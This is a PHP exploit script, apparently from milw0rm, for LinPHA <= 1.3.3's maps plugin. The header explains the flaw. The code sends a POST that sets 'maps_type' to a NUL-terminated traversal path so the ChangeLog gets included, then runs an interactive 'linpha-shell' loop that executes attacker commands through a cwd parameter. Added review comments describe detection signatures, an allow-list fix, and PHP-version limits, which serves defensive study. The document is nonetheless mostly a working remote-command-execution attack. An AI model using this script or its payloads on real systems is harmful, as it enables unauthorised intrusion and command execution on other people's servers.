
<?php
/*
--------------------------------------------------------------
LinPHA <= 1.3.3 (maps plugin) Remote Command Execution Exploit
--------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.....: http://linpha.sourceforge.net
details..: works with magic_quotes_gpc = off

[-] LFI found by rgod in /plugins/maps/map.main.class.php

20. if(!defined('TOP_DIR')) { define('TOP_DIR','../'); }
21.
22. $type = read_config('maps_type');
23.
24. require_once(TOP_DIR."/plugins/maps/$type/$type.class.php"); <== LFI
25. require_once(TOP_DIR.'/plugins/maps/geocode.class.php');
26. include_once(TOP_DIR.'/plugins/maps/location.class.php');

an attacker could include an arbitrary local file through the require_once() at
line 24, because it is possible to modify the 'maps_type' config value through another script:

[-] look at /plugins/maps/db_handler.php

112. if(@ $_POST['job'] == "settings")
113. {
114. update_config($_POST['maps_yahoo_id'], 'maps_yahoo_id' );
115. update_config($_POST['maps_google_key'], 'maps_google_key');
116. update_config($_POST['maps_type'], 'maps_type'); <== 'maps_type' value is updated straight from $_POST
117. update_config($_POST['maps_display_type'], 'maps_display_type');
118. update_config($_POST['maps_google_ctrl_size'], 'maps_google_ctrl_size');
119. update_config($_POST['maps_default_zoom'], 'maps_default_zoom');
120. update_config($_POST['maps_default_zoom_location'], 'maps_default_zoom_location');
121. update_config($_POST['maps_yahoo_type_control'], 'maps_yahoo_type_control');
122. update_config($_POST['maps_yahoo_pan_control'], 'maps_yahoo_pan_control');
123. update_config($_POST['maps_yahoo_slide_control'], 'maps_yahoo_slide_control');
124. update_config($_POST['maps_marker_auto_popup'], 'maps_marker_auto_popup');
125.
126. header("Location: ".TOP_DIR."/admin.php?page=maps&plugins=1");
127. }

and now we need a file to include... what do you think about ChangeLog?

[-] ChangeLog file:

393. ###############################################
394. ### ###
395. ### LinPHA 1.1.0 RELEASE! ###
396. ### ###
397. ###############################################
398.
399. 2006-02-19 bzrudi71 <linpha_AT_tuxpower_DOT_de>
400. * tagged LinPHA linpha_1_1_0 :-)
401.
402. 2006-02-18 flo
403. * fixed linpha vulnerability found on secunia.com
404. + docs/index.php and install/*
405. include($lang) fixed
406. + plugins/log/logger.class.php
407. use htmlspecialchars() before writing logger events to the database or to a text file
408. for example:
409. User <?php echo system($_GET['cwd']); ?>: login failed! <== oops! ;)
410. will be replaced by:
411. User <?php echo system($_GET['cwd']); ?>: login failed!

*/
// Runtime settings for the script itself: error_reporting(0) hides every PHP
// warning/notice (including failed fsockopen()/fread() calls and the never
// initialised $resp inside http_send), set_time_limit(0) lets the interactive
// loop below run without a time cap, and the 5 s socket timeout bounds reads
// on a stalled connection.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
/**
 * Sends one raw HTTP request to $host on port 80 and returns the whole response.
 *
 * @param string $host   target hostname or IP; the port is hard-coded to 80
 * @param string $packet complete request (headers and body) assembled by the caller
 * @return string raw response bytes; $resp is never initialised, so a response
 *                with no bytes yields null (the notice is hidden by error_reporting(0))
 *
 * NOTE(review): if fsockopen() keeps failing the retry loop never terminates —
 * with set_time_limit(0) there is no upper bound and no back-off. From the
 * defender's side that shows up as a steady stream of connection attempts to
 * port 80 from one client, which is visible in connection logs.
 */
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
// Retry until a socket is obtained; no cap, no delay between attempts.
while (!$sock)
{
print "\n[-] No response from ".$host.":80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
// Read until the server closes the connection; callers send "Connection: close".
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
// Banner, then a minimal argument check: two positional arguments (host and
// path) are required; with fewer, the usage text is printed and the script
// exits. No validation beyond the count is done on either value.
print "\n+------------------------------------------------------------------------+";
print "\n| LinPHA <= 1.3.3 (maps plugin) Remote Command Execution Exploit by EgiX |";
print "\n| - bug (LFI) found by rgod |";
print "\n+------------------------------------------------------------------------+\n";

if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to Linpha directory\n";
die();
}
$host = $argv[1];
$path = $argv[2];

// Stage 1: the settings POST to db_handler.php quoted in the header (its lines
// 112-127). 'maps_type' is stored straight from $_POST, and map.main.class.php
// line 24 later builds a require_once() path from it — that is the LFI. The
// value below ends in "%00"; the header's "works with magic_quotes_gpc = off"
// note is about exactly that byte, which magic quotes would escape. PHP 5.3.4
// and later reject NUL bytes in filesystem paths, so this stage also depends on
// the target's PHP version.
// Server-side fix: validate 'maps_type' against an allow-list of known provider
// names before storing it. No authorisation check is visible in the quoted
// db_handler.php excerpt; whether one exists earlier in that file should be
// confirmed against the full source.
// Detection: a POST to plugins/maps/db_handler.php whose maps_type value
// contains "../" (raw or URL-encoded) or an encoded NUL.
$payload = "job=settings&maps_type=%2E%2E/%2E%2E/ChangeLog%00";
// Hand-built HTTP/1.0 request; Content-Length is the byte length of the raw
// URL-encoded payload.
$packet = "POST {$path}plugins/maps/db_handler.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
// The response is discarded; whether the setting was actually stored is only
// inferred in the loop below from the content of a later page.
http_send($host, $packet);
// NOTE(review): define() is given the bare constant STDIN as its *name*. In the
// CLI SAPI STDIN is already a predefined stream constant, so depending on the
// PHP version this call is either a silent no-op (error_reporting(0)) or a
// TypeError; fgets() below works on the built-in STDIN either way.
define(STDIN, fopen("php://stdin", "r"));

// Stage 2: interactive loop. Each line read from stdin is sent as the `cwd`
// query parameter of maps_view.php (presumably that page loads
// map.main.class.php — not shown here). The header explains the parameter name:
// the ChangeLog pulled in through the require_once() at map.main.class.php line
// 24 carries the literal text "<?php echo system($_GET['cwd']); ?>" (its line
// 409), which executes once the file is included as PHP. The output is then cut
// out of the page between "User " and ": login failed!". Typing "exit" leaves
// the loop.
// Detection: GET requests for maps_view.php carrying a `cwd` parameter, and
// responses that echo ChangeLog text. The mitigation is on the include, not on
// the ChangeLog: once 'maps_type' is validated against an allow-list the file is
// never included and the text in it is inert.
while(1)
{
print "\nlinpha-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}maps_view.php?cwd=".urlencode($cmd)." HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$resp = http_send($host, $packet);
// Success check: the included ChangeLog must appear in the response. ereg() was
// deprecated in PHP 5.3 and removed in PHP 7, so this line fails on current PHP.
if (!ereg("ChangeLog", $resp)) die("\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
// Greedy capture across newlines (/s) between "User " and ": login failed!\n ";
// if the pattern does not match, $shell[1] is undefined and an empty line is printed.
preg_match("/User (.*): login failed!\n /s", $resp, $shell);
print "\n{$shell[1]}\n";
}
else break;
}
?>
# milw0rm.com [2008-04-07]